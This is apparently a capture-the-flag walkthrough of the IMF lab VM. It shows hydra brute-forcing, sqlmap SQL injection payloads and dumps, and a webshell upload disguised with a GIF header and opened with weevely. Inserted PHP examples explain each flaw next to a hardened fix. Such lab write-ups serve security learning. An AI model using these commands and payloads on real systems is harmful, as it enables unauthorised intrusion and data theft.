imf
1. Classic information gathering
nmap scan
┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sP 192.168.159.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 19:08 CST
Nmap scan report for 192.168.159.2
Host is up (0.00078s latency).
Nmap scan report for 192.168.159.129
Host is up (0.000098s latency).
Nmap scan report for 192.168.159.139
Host is up (0.0011s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.85 seconds
Check the ports
┌──(kali㉿kali)-[~/桌面]
└─$ nmap -A -p- 192.168.159.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 19:11 CST
Nmap scan report for 192.168.159.139
Host is up (0.00065s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.05 seconds
Scan for back-end paths
┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u 192.168.159.139
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/桌面/reports/_192.168.159.139/_24-08-15_19-09-48.txt
Target: http://192.168.159.139/
[19:09:54] Starting:
[19:09:55] 301 - 315B - /js -> http://192.168.159.139/js/
[19:09:57] 403 - 301B - /.ht_wsr.txt
[19:09:57] 403 - 304B - /.htaccess.bak1
[19:09:57] 403 - 306B - /.htaccess.sample
[19:09:57] 403 - 303B - /.htaccessOLD2
[19:09:57] 403 - 302B - /.htaccess_sc
[19:09:57] 403 - 305B - /.htaccess_extra
[19:09:57] 403 - 302B - /.htaccessOLD
[19:09:57] 403 - 304B - /.htaccess_orig
[19:09:57] 403 - 304B - /.htaccess.orig
[19:09:57] 403 - 302B - /.htaccessBAK
[19:09:57] 403 - 304B - /.htaccess.save
[19:09:57] 403 - 295B - /.html
[19:09:57] 403 - 304B - /.htpasswd_test
[19:09:57] 403 - 294B - /.htm
[19:09:57] 403 - 301B - /.httr-oauth
[19:09:57] 403 - 300B - /.htpasswds
[19:09:58] 403 - 294B - /.php
[19:09:58] 403 - 295B - /.php3
[19:10:17] 200 - 2KB - /contact.php
[19:10:18] 301 - 316B - /css -> http://192.168.159.139/css/
[19:10:23] 301 - 318B - /fonts -> http://192.168.159.139/fonts/
[19:10:26] 301 - 319B - /images -> http://192.168.159.139/images/
[19:10:26] 403 - 297B - /images/
[19:10:28] 403 - 293B - /js/
[19:10:42] 200 - 2KB - /projects.php
[19:10:45] 403 - 304B - /server-status/
[19:10:45] 403 - 303B - /server-status
Found the first flag inside contact.php
The flag is obviously base64 at a glance
Didn't get it, what does althefile mean
But looking at the js files there, one of them is base64-encoded
After decoding it's this
yYXRvcg==}
🤔, looks like a fragment
So I'll add the two above to it as well
Sure enough
flag2 came out too
aW1mYWRtaW5pc3RyYXRvcg==
Base64-decode once more
imfadministrator looks like it should be a directory; going in, it's a login form with only username and password
Tried running sqlmap, tried running hydra, neither worked; also guessed it might be one of the three users under contact.php (there are three names there)
but none of those worked
Tried the PHP array '[ ]' bypass, to test whether the back end uses an unsafe function for password verification
PHP functions that can be bypassed with an array '[ ]':
sha1
md5
ereg
strpos
strcmp
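Why the array trick in the list above works, and what a safe check looks like, as an added example that is not code from this writeup or from the IMF VM. The login-handler shape and the secret are assumptions for illustration; the behaviour shown is PHP's own: on PHP 5/7, strcmp(), md5(), sha1() and strpos() given an array emit a warning and return NULL, and `NULL == 0` is true, which is what the loose comparison below relies on.

```php
<?php
// Added example, not code from the original writeup or from the IMF VM.
// Shows why `strcmp($input, $secret) == 0` is bypassed when the client
// sends `pass[]=x` (PHP then populates $_POST['pass'] with an array), and
// a strict replacement. Handler shape and secret are assumptions.

// Vulnerable pattern: strcmp() on untrusted input with loose comparison.
// PHP 5/7: strcmp(array, string) warns and returns NULL; NULL == 0 is true,
// so any array "matches". PHP 8 throws a TypeError instead (caught here so
// the demo runs on either version); the bypass is a PHP 5/7 behaviour.
// The same NULL return is what makes md5(), sha1() and strpos() bypassable.
function loginLoose($input, string $secret): bool
{
    try {
        return @strcmp($input, $secret) == 0;   // NULL == 0 on PHP 5/7
    } catch (TypeError $e) {
        return false;                           // PHP 8 rejects the array
    }
}

// Hardened pattern: reject anything that is not a string before comparing,
// then verify against a stored hash with a constant-time comparison.
function loginStrict($input, string $storedHash): bool
{
    if (!is_string($input)) {
        return false;   // pass[]=x, pass[a]=b, missing field: all rejected
    }
    return password_verify($input, $storedHash);
}

// Constructed request bodies, as PHP would turn them into $_POST['pass']:
//   pass=wrong       -> 'wrong'
//   pass[]=anything  -> ['anything']
$secret = 'example-secret';                      // assumption
$hash   = password_hash($secret, PASSWORD_DEFAULT);

$cases = [
    'wrong string' => 'wrong',
    'array input'  => ['anything'],   // the bypass case
    'correct'      => $secret,
];

foreach ($cases as $label => $input) {
    printf("%-13s loose=%-5s strict=%s\n",
        $label,
        var_export(loginLoose($input, $secret), true),
        var_export(loginStrict($input, $hash), true));
}
```

Run it under PHP 7 and the "array input" row is accepted by the loose check and rejected by the strict one; under PHP 8 both reject it, because the TypeError replaced the silent NULL. The `is_string()` guard is the part that matters regardless of version, since any of the listed functions fed a non-string is a bug rather than a comparison.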
When brute-forcing, rmichaels turned out to exist
hydra -l rmichaels -P /usr/share/wordlists/rockyou.txt 192.168.159.139 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:error"
flag3
Stared at the three things for ages and found nothing; tried SQL injection, and this time there was an error
sqlmap -u 'http://192.168.159.139/imfadministrator/cms.php?pagename=home' --cookie 'PHPSESSID=2n5274m8us95f0p8g59643oqt0' --dump
Output
┌──(kali㉿kali)-[~]
└─$ sqlmap -u 'http://192.168.159.139/imfadministrator/cms.php?pagename=home' --cookie 'PHPSESSID=2n5274m8us95f0p8g59643oqt0' --dump
___
__H__
___ ___[.]_____ ___ ___ {1.8.7#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:49:03 /2024-08-15/
[19:49:03] [INFO] resuming back-end DBMS 'mysql'
[19:49:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pagename (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagename=home' AND 7798=7798 AND 'ySad'='ySad
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pagename=home' AND (SELECT 5733 FROM(SELECT COUNT(*),CONCAT(0x7176707871,(SELECT (ELT(5733=5733,1))),0x7162627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CdrD'='CdrD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagename=home' AND (SELECT 3343 FROM (SELECT(SLEEP(5)))Sctp) AND 'CJIN'='CJIN
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: pagename=-3960' UNION ALL SELECT CONCAT(0x7176707871,0x5266474a59766f466a63444e4758726f447a677748476d7146444d5850487153644e756173757052,0x7162627671)#
---
[19:49:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[19:49:03] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:49:03] [INFO] fetching current database
[19:49:03] [INFO] fetching tables for database: 'admin'
[19:49:03] [INFO] fetching columns for table 'pages' in database 'admin'
[19:49:03] [INFO] retrieved: 'id','int(11)'
[19:49:03] [INFO] retrieved: 'pagename','varchar(255)'
[19:49:03] [INFO] retrieved: 'pagedata','text'
[19:49:03] [INFO] fetching entries for table 'pages' in database 'admin'
[19:49:03] [INFO] retrieved: '1','Under Construction.','upload'
[19:49:03] [INFO] retrieved: '2','Welcome to the IMF Administration.','home'
[19:49:03] [INFO] retrieved: '3','Training classrooms available. <br /><img src="./images/w...
[19:49:03] [INFO] retrieved: '4','<h1>Disavowed List</h1><img src="./images/redacted.jpg"><...
Database: admin
Table: pages
[4 entries]
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| id | pagedata | pagename |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| 1 | Under Construction. | upload |
| 2 | Welcome to the IMF Administration. | home |
| 3 | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training. | tutorials-incomplete |
| 4 | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary | disavowlist |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
[19:49:03] [INFO] table '`admin`.pages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.159.139/dump/admin/pages.csv'
[19:49:03] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.159.139'
[*] ending @ 19:49:03 /2024-08-15/
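What the sqlmap session above implies about cms.php, as an added example that is not code from this writeup or from the IMF VM: the four payloads all close a single-quoted string, so `pagename` is being pasted into the SQL text. The query shape below is an assumption about what such a page does; the table name and columns (`pages`: `id`, `pagename`, `pagedata`) and the rows come from the dump above. The vulnerable query is shown beside its prepared-statement fix, against a constructed in-memory SQLite database (requires the pdo_sqlite extension).

```php
<?php
// Added example, not code from the original writeup or from the IMF VM.
// Vulnerable string-built query beside the prepared-statement fix, using
// the `pages(id, pagedata, pagename)` table from the sqlmap dump above.
// The query shape is assumed; the IMF cms.php source is not on the page.

// Vulnerable: the parameter becomes part of the SQL text, so sqlmap's
// boolean probe  home' AND 7798=7798 AND 'ySad'='ySad  is evaluated as SQL.
function fetchPageVulnerable(PDO $db, string $pagename): ?string
{
    $sql = "SELECT pagedata FROM pages WHERE pagename = '$pagename'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['pagedata'];
}

// Fixed: a bound parameter keeps the value out of the SQL text; the same
// probe string is now just a page name that does not exist.
function fetchPageSafe(PDO $db, string $pagename): ?string
{
    $stmt = $db->prepare('SELECT pagedata FROM pages WHERE pagename = :name');
    $stmt->execute([':name' => $pagename]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['pagedata'];
}

// Constructed stand-in for the MySQL `admin` database, seeded with two of
// the rows from the dump above.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, pagedata TEXT, pagename TEXT)');
$db->exec("INSERT INTO pages VALUES (1, 'Under Construction.', 'upload')");
$db->exec("INSERT INTO pages VALUES (2, 'Welcome to the IMF Administration.', 'home')");

// sqlmap's boolean-based blind probe, copied from the session above.
$probe = "home' AND 7798=7798 AND 'ySad'='ySad";

// Legitimate value: both versions return the home page.
echo "home  vulnerable: ", fetchPageVulnerable($db, 'home'), "\n";
echo "home  safe      : ", fetchPageSafe($db, 'home'), "\n";

// Probe: the vulnerable query still returns the home page (the injected
// condition is true), which is exactly the signal sqlmap keys on; the safe
// query finds no page with that literal name.
echo "probe vulnerable: ", fetchPageVulnerable($db, $probe) ?? '(no row)', "\n";
echo "probe safe      : ", fetchPageSafe($db, $probe) ?? '(no row)', "\n";
```

The detection angle follows from the same lines: a page name containing a quote, `AND`, `SLEEP(` or `UNION` in the access log (sqlmap's time-based and UNION payloads above are all in the GET query string) is worth alerting on, and the prepared statement is what turns those requests from a dump into a 404.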
Visited the two images I hadn't looked at before; behind the whiteboard one there's a QR code
flag4 get
Same old routine, base64 again
(like unwrapping a zongzi, one layer at a time
Pretty obviously an upload-a-webshell
Linux has weevely, a lower-tier equivalent of China Chopper (菜刀); let's try it
Honestly I was already doubting it; prepended a gif header
Sure enough, flatly rejected, sad
OK, my fault, forgot to rename c.php to c.gif; this time the upload succeeded
In the source I saw the name it was stored under on the server: e4608a7887a0
weevely connection
┌──(kali㉿kali)-[~]
└─$ weevely http://192.168.159.139/imfadministrator/uploads/e4608a7887a0.gif test
[+] weevely 4.0.1
[+] Target: 192.168.159.139
[+] Session: /home/kali/.weevely/sessions/192.168.159.139/e4608a7887a0_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> id
It errored here, with a connection error afterwards; strange, the password I set was test
Since this doesn't work I'll try something else; I had tested that only image-type files get through, so I'll wrap it in a file then
copy /b 文件1+文件2 文件3
Still no; in the end it was my own hand-written webshell, depressing
GIF89a
This time it worked
Why not use AntSword (蚁剑)? There's a WAF again this time; as simple as that
This time flag5 finally came out; lighting a cigarette.jpg
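The upload step above went through once the file was renamed to .gif and given a GIF89a header, so the filter was looking at the extension and the first bytes only. As an added example that is not code from this writeup or from the IMF VM, here is that naive check beside a stricter one that requires the bytes to decode as an image and re-encodes them before storage; the path and naming below are assumptions, and the strict path needs the GD extension.

```php
<?php
// Added example, not code from the original writeup or from the IMF VM.
// Naive upload check (extension + magic bytes) beside a strict one (decode
// with GD, re-encode, server-chosen name). Paths and names are assumed.

// Naive check: extension whitelist plus magic-bytes sniff. The constructed
// "GIF89a" + PHP sample below satisfies both, so it is accepted.
function naiveAccept(string $filename, string $bytes): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $looksLikeGif = strncmp($bytes, 'GIF87a', 6) === 0
                 || strncmp($bytes, 'GIF89a', 6) === 0;
    return in_array($ext, ['gif', 'jpg', 'png'], true) && $looksLikeGif;
}

// Strict check: the bytes must fully parse as an image, and what gets
// stored is a fresh encoding of the decoded pixels, so any text that rode
// along in the original bytes does not survive. Returns the clean bytes,
// or null when GD cannot decode the input.
function strictAccept(string $bytes): ?string
{
    $img = @imagecreatefromstring($bytes);   // false for anything GD cannot parse
    if ($img === false) {
        return null;                          // "GIF89a<?php ..." ends up here
    }
    ob_start();
    imagegif($img);                           // re-encode from pixels only
    $clean = ob_get_clean();
    imagedestroy($img);
    return $clean;
}

// Constructed sample 1: the trick from above, PHP text behind a GIF header.
$fakeGif = "GIF89a<?php echo 'constructed placeholder'; ?>";

// Constructed sample 2: a real 1x1 GIF produced by GD itself.
$real = imagecreatetruecolor(1, 1);
ob_start();
imagegif($real);
$realGif = ob_get_clean();
imagedestroy($real);

foreach (['fake' => $fakeGif, 'real' => $realGif] as $label => $bytes) {
    printf("%-4s naive=%-5s strict=%s\n",
        $label,
        var_export(naiveAccept('c.gif', $bytes), true),
        strictAccept($bytes) === null ? 'rejected' : 'accepted');
}

// Storage rules that go with the strict check (assumed directory): the
// server picks the name and the extension, and the directory sits outside
// the web root or has script execution disabled, so even a file that
// passed the check is only ever served as data.
$cleanBytes = strictAccept($realGif);
$storedName = bin2hex(random_bytes(6)) . '.gif';
// file_put_contents(UPLOAD_DIR . '/' . $storedName, $cleanBytes);  // UPLOAD_DIR assumed
```

The page shows the second half of the problem as well: the stored file was renamed to e4608a7887a0.gif, yet weevely still got a shell from that URL, so the web server was executing the .gif as PHP. Re-encoding closes the filter bypass; keeping uploads out of any location where the server hands .gif to the PHP handler closes the execution.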
Later the writeup says there's a buffer overflow; too late, don't feel like learning it, tomorrow
Follow-up
Strange, I tried weevely again and the upload succeeded too, but when connecting it said there was a problem communicating with the backdoor,
and wget also had problems when uploading my own hand-written webshell; really strange
Couldn't get a shell, so couldn't go any further; this thing is haunted
Solved it, and it's a bit much: kali 2024.1 can use weevely as long as you don't change sources or update, but once the sources are changed and updated, or on the downloaded 2024.2, it doesn't work; for a moment it was hard to take
This time it finally succeeded
Speechless; so keeping up to date is my fault now
With that, flag5 can be grabbed too
Keep peeling the onion
find / -name agent 2>/dev/null
2>/dev/null: send the errors to /dev/null so only the correct results are shown
Found that these two folders have an agent file
Went into bin and saw two files
www-data@imf:/var/www/html/imfadministrator/uploads $ cd /usr/local/bin/
It hinted syn 7482 8279 9467
Should be port numbers; scan them with nmap
Nothing found; looked at the writeup, should knock first and then test the ports
Annoying, this kali just won't download knockd; error
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
E: 无法定位软件包 knockd
That left me a bit speechless
Did it on another machine, knocked for ages, nmap-scanned for ages, 7788 still not open
Seriously, after all this back and forth, I don't want to do this one anymore; abandoning it